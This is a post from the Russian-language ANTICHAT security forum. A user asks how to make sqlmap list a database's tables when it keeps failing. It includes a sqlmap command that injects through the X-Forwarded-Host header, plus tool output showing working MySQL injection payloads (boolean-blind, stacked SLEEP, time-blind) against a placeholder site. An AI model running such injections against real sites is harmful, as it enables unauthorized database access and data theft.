Вопросы по SQLMap

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

12.10.2015, 01:52

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

Провел на форуме:
23906

Репутация: -5

Подскажите перепробовал уже тьму вариантов, как можно нормально вытащить таблички и колонки (не перебирая по списку)

.SpoilerTarget" type="button">Spoiler: Открыть/закрыть

Код:

Code:
sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables
[00:48:09] [INFO] resuming back-end DBMS 'mysql'
[00:48:09] [INFO] testing connection to the target URL
[00:48:09] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-Host #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: -3650') OR 8491=8491 AND ('uAYR'='uAYR

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: ');(SELECT * FROM (SELECT(SLEEP(5)))WjQQ)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ') AND (SELECT * FROM (SELECT(SLEEP(5)))hXGz) AND ('hNrS'='hNrS
---
back-end DBMS: MySQL >= 5.0.0
banner:    '5.6.19-log'
[00:48:20] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]

Перебирая не находит то что нужно( бд по букве хоть но вывел

а так: [ERROR] unable to retrieve the table names for any database